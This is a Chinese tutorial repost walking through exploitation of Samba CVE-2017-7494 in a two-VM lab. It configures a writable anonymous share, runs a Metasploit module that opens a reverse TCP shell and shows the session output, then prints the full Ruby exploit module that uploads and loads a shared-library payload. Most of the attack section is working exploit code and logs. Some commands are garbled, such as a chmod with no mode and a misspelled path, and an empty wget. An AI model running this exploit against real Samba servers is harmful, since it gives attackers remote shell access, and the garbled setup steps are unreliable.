首页 >运维 >linux运维 >Samba远程代码执行漏洞的实例详解

Samba远程代码执行漏洞的实例详解

零下一度
零下一度原创
2017-07-17 11:11:463350浏览

Samba是在Linux和UNIX系统上实现SMB协议的一个软件。

2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。

360网络安全中心 和 360信息安全部的Gear Team第一时间对该漏洞进行了分析,确认属于严重漏洞,可以造成远程代码执行。

漏洞简述

▼▼

漏洞编号:CVE-2017-7494

危害等级:严重

影响版本:Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中间版本

漏洞描述:2017年5月24日Samba发布了4.6.4版本,修复了一个严重的远程代码执行漏洞,该漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。

技术分析

▼▼

如官方所描述,该漏洞只需要通过一个可写入的Samba用户权限就可以提权到samba所在服务器的root权限(samba默认是root用户执行的)。

一、复现环境搭建

搭建Debian和kali两个虚拟机: 攻击机:kali (192.168.217.162); 靶机:debian (192.168.217.150)。

二、Debian安装并配置samba

1、首先,下载安装samba服务器

# apt-get install samba

2、在debian下创建一个共享目录,我这里为/mnt/shared

# mkdir  /mnt/shared

3、配置samba服务器的配置文件/etc/samba/smb.conf,在最后添加:

[shared]
  comment = 'Share for work'
  path= /mnt/shared
  guest ok = yes
  public = yes
  writable = yes
  create mask = 0777

4、设置/mnt/shared权限

# chmod –R /mnt/sspaned

5、重启samba服务

# /etc/init.d/samba restart

三、设置攻击机kali

打开kali终端进入到metasploit的exploit目录下的linux文件夹,并新建一个smb文件夹,将攻击脚本放入其中:

# cd /usr/share/metasploit-framework/modules/exploits/linux
# mkdir smb
# wget

运行metasploit,开始进行攻击(攻击脚本被我重命名为(cve-2017-7494.rb)

# msfconsole
msf > use exploit/linux/smb/cve-2017-7494
msf exploit(cve-2017-7494) > set rhost 192.168.217.150
rhost => 192.168.217.150
msf exploit(cve-2017-7494) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf exploit(cve-2017-7494) > set lhost 192.168.217.162
rhost => 192.168.217.162
msf exploit(cve-2017-7494) > run
[*] Started reverse TCP handler on 192.168.217.162:4444
[*] 192.168.217.150:445 - Using location \\192.168.217.150\shared\ for the path
[*] 192.168.217.150:445 - Payload is stored in //192.168.217.150/shared/ as WzyvkESS.so
[*] 192.168.217.150:445 - Trying location /volume1/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume1/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume1/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume1/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /mnt/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /mnt/shared/WzyvkESS.so...
[*] Sending stage (38 bytes) to 192.168.217.150
[*] Command shell session 2 opened (192.168.217.162:4444 -> 192.168.217.150:56540) at 2017-05-26 01:17:48 -0400

id
uid=65534(nobody) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)

ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:6e:9a:4a
inet addr:192.168.217.150 Bcast:192.168.217.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe6e:9a4a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6769 errors:0 dropped:0 overruns:0 frame:0
TX packets:700 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:479898 (468.6 KiB) TX bytes:102796 (100.3 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:35 errors:0 dropped:0 overruns:0 frame:0
TX packets:35 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3557 (3.4 KiB) TX bytes:3557 (3.4 KiB)

whoami
nobody

POC:

  1 ##  2 # This module requires Metasploit:   3 # Current source:   4 ##  5   6 class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client def initialize(info = {}) super(update_info(info, &#39;Name&#39; => 'Samba is_known_pipename() Arbitrary Module Load',  7       'Description'    => %q{  8           This module triggers an arbitrary shared library load vulnerability  9         in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module 10         requires valid credentials, a writeable folder in an accessible share, 11         and knowledge of the server-side path of the writeable folder. In 12         some cases, anonymous access combined with common filesystem locations 13         can be used to automatically exploit this vulnerability. 14       }, 15       'Author'         => 16         [ 17           'steelo <knownsteelo[at]gmail.com>',    # Vulnerability Discovery 18           'hdm',                                  # Metasploit Module 19         ], 20       'License'        => MSF_LICENSE, 21       'References'     => 22         [ 23           [ 'CVE', '2017-7494' ], 24           [ 'URL', '' ], 25         ], 26       'Payload'         => 27         { 28           'Space'       => 9000, 29           'DisableNops' => true 30         }, 31       'Platform'        => 'linux', 32       # 33       # Targets are currently limited by platforms with ELF-SO payload wrappers 34       # 35       'Targets'         => 36         [ 37           [ 'Linux ARM (LE)',   { 'Arch' => ARCH_ARMLE } ], 38           [ 'Linux x86',        { 'Arch' => ARCH_X86 } ], 39           [ 'Linux x86_64',     { 'Arch' => ARCH_X64 } ], 40         # [ 'Linux MIPS',       { 'Arch' => MIPS } ], 41         ], 42       'Privileged'      => true, 43       'DisclosureDate'  => 'Mar 24 2017', 44       'DefaultTarget'   => 2)) 45  46     register_options( 47       [ 48         OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']), 49         OptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']), 50         OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']), 51       ]) 52   end 53  54  55   def generate_common_locations 56     candidates = [] 57     if datastore['SMB_SHARE_BASE'].to_s.length > 0 58       candidates << datastore[&#39;SMB_SHARE_BASE&#39;] 59     end 60  61     %W{/volume1 /volume2 /volume3 /shared /mnt /mnt/usb /media /mnt/media /var/samba /tmp /home /home/shared}.each do |base_name| 62       candidates << base_name 63       candidates << [base_name, @share] 64       candidates << [base_name, @share.downcase] 65       candidates << [base_name, @share.upcase] 66       candidates << [base_name, @share.capitalize] 67       candidates << [base_name, @share.gsub(" ", "_")] 68     end 69  70     candidates.uniq 71   end 72  73   def enumerate_directories(share) 74     begin 75       self.simple.connect("\\\\#{rhost}\\#{share}") 76       stuff = self.simple.client.find_first("\\*") 77       directories = [""] 78       stuff.each_pair do |entry,entry_attr| 79         next if %W{. ..}.include?(entry) 80         next unless entry_attr[&#39;type&#39;] == &#39;D&#39; 81         directories << entry end return directories rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e 82       vprint_error("Enum #{share}: #{e}") 83       return nil 84  85     ensure 86       if self.simple.shares["\\\\#{rhost}\\#{share}"] 87         self.simple.disconnect("\\\\#{rhost}\\#{share}") 88       end 89     end 90   end 91  92   def verify_writeable_directory(share, directory="") 93     begin 94       self.simple.connect("\\\\#{rhost}\\#{share}") 95  96       random_filename = Rex::Text.rand_text_alpha(5)+".txt" 97       filename = directory.length == 0 ? "\\#{random_filename}" : "\\#{directory}\\#{random_filename}" 98  99       wfd = simple.open(filename, 'rwct')100       wfd << Rex::Text.rand_text_alpha(8) wfd.close simple.delete(filename) return true rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e101       vprint_error("Write #{share}#{filename}: #{e}")102       return false103 104     ensure105       if self.simple.shares["\\\\#{rhost}\\#{share}"]106         self.simple.disconnect("\\\\#{rhost}\\#{share}")107       end108     end109   end110 111   def share_type(val)112     [ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val]113   end114 115   def enumerate_shares_lanman116     shares = []117     begin118       res = self.simple.client.trans(119         "\\PIPE\\LANMAN",120         (121           [0x00].pack('v') +122           "WrLeh\x00"   +123           "B13BWz\x00"  +124           [0x01, 65406].pack("vv")125         ))126     rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e127       vprint_error("Could not enumerate shares via LANMAN")128       return []129     end130     if res.nil?131       vprint_error("Could not enumerate shares via LANMAN")132       return []133     end134 135     lerror, lconv, lentries, lcount = res['Payload'].to_s[136       res['Payload'].v['ParamOffset'],137       res['Payload'].v['ParamCount']138     ].unpack("v4")139 140     data = res['Payload'].to_s[141       res['Payload'].v['DataOffset'],142       res['Payload'].v['DataCount']143     ]144 145     0.upto(lentries - 1) do |i|146       sname,tmp = data[(i * 20) +  0, 14].split("\x00")147       stype     = data[(i * 20) + 14, 2].unpack('v')[0]148       scoff     = data[(i * 20) + 16, 2].unpack('v')[0]149       scoff -= lconv if lconv != 0150       scomm,tmp = data[scoff, data.length - scoff].split("\x00")151       shares << [ sname, share_type(stype), scomm] end shares end def probe_module_path(path) begin simple.create_pipe(path) rescue Rex::Proto::SMB::Exceptions::ErrorCode => e152       vprint_error("Probe: #{path}: #{e}")153     end154   end155 156   def find_writeable_path(share)157     subdirs = enumerate_directories(share)158     return unless subdirs159 160     if datastore['SMB_FOLDER'].to_s.length > 0161       subdirs.unshift(datastore['SMB_FOLDER'])162     end163 164     subdirs.each do |subdir|165       next unless verify_writeable_directory(share, subdir)166       return subdir167     end168 169     nil170   end171 172   def find_writeable_share_path173     @path = nil174     share_info = enumerate_shares_lanman175     if datastore['SMB_SHARE_NAME'].to_s.length > 0176       share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']177     end178 179     share_info.each do |share|180       next if share.first.upcase == 'IPC$'181       found = find_writeable_path(share.first)182       next unless found183       @share = share.first184       @path  = found185       break186     end187   end188 189   def find_writeable190     find_writeable_share_path191     unless @share && @path192       print_error("No suiteable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER")193       fail_with(Failure::NoTarget, "No matching target")194     end195     print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")196   end197 198   def upload_payload199     begin200       self.simple.connect("\\\\#{rhost}\\#{@share}")201 202       random_filename = Rex::Text.rand_text_alpha(8)+".so"203       filename = @path.length == 0 ? "\\#{random_filename}" : "\\#{@path}\\#{random_filename}"204       wfd = simple.open(filename, 'rwct')205       wfd << Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, payload.encoded, "elf-so", {:arch => target.arch, :platform => target.platform}206       )207       wfd.close208 209       @payload_name = random_filename210       return true211 212     rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e213       print_error("Write #{@share}#{filename}: #{e}")214       return false215 216     ensure217       if self.simple.shares["\\\\#{rhost}\\#{@share}"]218         self.simple.disconnect("\\\\#{rhost}\\#{@share}")219       end220     end221   end222 223   def find_payload224     print_status("Payload is stored in //#{rhost}/#{@share}/#{@path} as #{@payload_name}")225 226     # Reconnect to IPC$227     simple.connect("\\\\#{rhost}\\IPC$")228 229     #230     # In a perfect world we would find a way make IPC$'s associated CWD231     # change to our share path, which would allow the following code:232     #233     # probe_module_path("/proc/self/cwd/#{@path}/#{@payload_name}")234     #235 236     # Until we find a better way, brute force based on common paths237     generate_common_locations.each do |location|238       target = [location, @path, @payload_name].join("/").gsub(/\/+/, '/')239       print_status("Trying location #{target}...")240       probe_module_path(target)241     end242   end243 244   def exploit245     # Setup SMB246     connect247     smb_login248 249     # Find a writeable share250     find_writeable251 252     # Upload the shared library payload253     upload_payload254 255     # Find and execute the payload from the share256     find_payload rescue Rex::StreamClosedError257 258     # Shutdown259     disconnect260   end261 262 end

 

以上是Samba远程代码执行漏洞的实例详解的详细内容。更多信息请关注PHP中文网其他相关文章!

声明:
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn